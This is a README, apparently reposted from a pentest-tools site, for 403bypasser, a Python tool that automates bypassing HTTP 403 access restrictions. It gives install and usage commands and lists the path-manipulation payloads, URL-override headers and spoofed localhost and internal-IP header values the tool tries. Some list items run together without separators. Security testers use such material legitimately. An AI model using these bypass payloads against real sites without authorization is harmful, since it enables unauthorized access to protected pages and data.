403bypasser automates the techniques used to circumvent access control restrictions on target pages. 403bypasser will continue to be improved and it is open to contributions.
Installation
- Clone the repository to your machine.
git clone https://github.com/yunemse48/403bypasser.git - Install required modules by running the code
pip install -r requirements.txt - READY!
Usage
Arguments:
| Argument | Description | Examples | Note |
|---|---|---|---|
| -u | single URL to scan | http://example.com or http://example.com/ | All these example usages are interpreted in the same way |
| -U | path to list of URLs | ./urllist.txt, ../../urllist.txt, etc. | Just provide the path where the file is located 🙂 |
| -d | single directory to scan | admin or /admin or admin/ or /admin/ | All these example usages are interpreted in the same way |
| -D | path to list of directories | ./dirlist.txt, ../../dirlist.txt, etc. | Just provide the path where the file is located 🙂 |
Usage 1: python3 403bypasser.py -u https://example.com -d /secret
Usage 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
Usage 3: python3 403bypasser.py -U urllist.txt -d /secret
Usage 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
IMPORTANT NOTE: All the followings are interpreted the same. Therefore, which pattern you use is just a matter of preference.
python3 403bypasser.py -u https://example.com -d secretpython3 403bypasser.py -u https://example.com -d /secretpython3 403bypasser.py -u https://example.com -d /secret/python3 403bypasser.py -u https://example.com -d secret/python3 403bypasser.py -u https://example.com/ -d secret
ALL THE SAME!
Since Python is a cross-platform language, one can run this program on different operating systems.
Output
The output of the program is saved (in the current directory) in a file with the name of the domain name given as input.
For example: python3 403bypasser.py -u https://example.com -d /secret is given. Then the output is saved to example.txt in the current directory.
Release Notes
Changes in v2.0: Considerable changes have been done in this version. The project is completely moved to Python 3 from Bash. New and wide variety of techniques have been added.
Changes in v1.1: It’s now possible to pass files (lists) to 403bypasser as input via arguments. Furthermore, two more test cases added: poisoning with 1)X-Original-URL and 2)X-Rewrite-URL headers.
To-Do List
- GUI
- Add Rate-Limit / Threads Option
- Add an Option for Scan Types (fast, normal, aggressive or only path manipulation / header manipulation)
- Export cURL Command for Each Request
- Add Parameters to Save Output According to HTTP Status Codes
- Add Parameters to Save Output According to Page Size Anomalies
Which Cases Does This Tool Check?
1. Request Method Manipulation
- Convert GET request to POST request
2. Path Manipulation
/%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparam/secret#/secret#test/secret/.//secret///./secret/./
3. Overriding the Target URL via Non-Standard Headers
X-Original-URL: /secretX-Rewrite-URL: /secret
4. Other Headers & Values
Headers:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IP
Values:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0172.16.0.1192.168.1.0192.168.1.1
Source : KitPloit – PenTest Tools!